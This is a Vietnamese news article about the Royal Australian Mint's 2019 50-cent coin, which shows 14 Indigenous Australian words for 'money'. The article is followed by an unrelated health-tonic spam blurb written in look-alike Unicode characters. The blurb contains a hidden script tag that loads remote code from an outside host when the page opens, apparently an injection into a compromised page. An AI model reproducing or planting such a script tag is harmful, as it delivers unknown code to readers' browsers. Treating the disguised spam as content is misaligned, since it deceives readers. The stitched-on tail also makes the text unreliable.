RSS

Úc: Phát hành đồng tiền 50 xu mới để tôn vinh các ngôn ngữ bản địa

08:00 11/04/2019

Một đồng tiền mệnh giá 50 xu hoàn toàn mới đã được Sở đúc tiền Hoàng gia phát hành, với một điểm đặc biệt mà không đồng tiền nào khác từng có trước đây.

Sở đúc tiền Hoàng gia Úc đã phát hành đồng tiền 50 xu mới vào thứ Hai 8/4 để kỷ niệm Năm quốc tế về ngôn ngữ bản địa.

Đồng xu mới có 14 bản dịch khác nhau cho từ “money” (tiền) từ các ngôn ngữ bản địa Úc.

Giám đốc điều hành của Sở đúc tiền Hoàng gia, Ross MacDiarmid, cho biết họ đã làm việc với Viện nghiên cứu Thổ dân và cư dân đảo Torres Strait (AIATSIS) để tập hợp các nhóm ngôn ngữ bản địa khác nhau để tạo ra đồng tiền mới này.

“Những đồng tiền này là một sự tôn vinh các ngôn ngữ bản địa độc đáo và đa dạng của Úc”, ông MacDiarmid nói.

“Chúng tôi hy vọng những đồng tiền này sẽ đóng vai trò như một lời nhắc nhở hữu hình về tầm quan trọng của những nỗ lực nhằm bảo tồn, bảo vệ và phục hồi các ngôn ngữ bản địa Úc”.

Trước khi những vùng đất bản địa bị người châu Âu xâm chiếm, không có từ nào có nghĩa là “tiền” vì những vật phẩm như vỏ ngọc trai, thạch anh hay thực phẩm được sử dụng để trao đổi hàng hóa.

Nhà ngôn ngữ học của Đại học Queensland, Felicity Meakins, giải thích rằng các ngôn ngữ bản địa cần được mở rộng vốn từ về tiền bạc.

“Những đồng tiền này là một sự ghi nhớ các ngôn ngữ bản địa độc đáo và đa dạng của Úc”, ông MacDiarmid nói.

Các từ được sử dụng trên đồng tiền mới là sự kết hợp các cụm từ từ các nhóm bản địa khác nhau.

Chẳng hạn, từ “ngkweltye” từ tiếng Kaytetye được nói ở Trung Úc và từ “pirrki” theo ngôn ngữ của người Kaurna ở các vùng của Nam Úc được dịch thành chữ “piece” (mảnh).

Ở Gathang, từ “dhinggarr” vốn được sử dụng ở vùng biển miền trung của bang NSW có nghĩa là “grey” (màu xám) và được sử dụng để mô tả màu sắc của đồng tiền.

AIATSIS đã thực hiện một cuộc khảo sát vào năm 2014 cho thấy người Úc bản địa coi ngôn ngữ là thứ quan trọng đối với bản sắc của họ và công nhận rằng việc gìn giữ ngôn ngữ sẽ củng cố sự thịnh vượng và lòng tự tôn trong các cộng đồng bản địa.

Craig Ritchie, giám đốc điều hành của AIATSIS nói, “các ngôn ngữ bản địa mang nhiều ý nghĩa hơn so với bản thân các từ, vì vậy tiền tệ cũng mang ý nghĩa vượt quá giá trị vật chất của nó”.

“Việc phát hành những đồng tiền này là một cột mốc quan trọng khác trong việc công nhận các nền văn hóa đa dạng hình thành nên lịch sử quốc gia hơn 60.000 năm của chúng ta”.

Cuộc khảo sát năm 2014 cũng chỉ tìm thấy 120 ngôn ngữ bản địa Úc còn được sử dụng ngày nay so với hơn 250 ngôn ngữ được sử dụng vào năm 1788.

Đồng xu đã được đưa vào lưu hành vào thứ Hai 8/4 và Sở đúc tiền Hoàng gia cũng đang bán một phiên bản thô không được lưu hành với giá 10 đô la, trong khi phiên bản cao cấp bằng bạc có giá 80 đô la.

Nguồn: Vietucnews.net

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.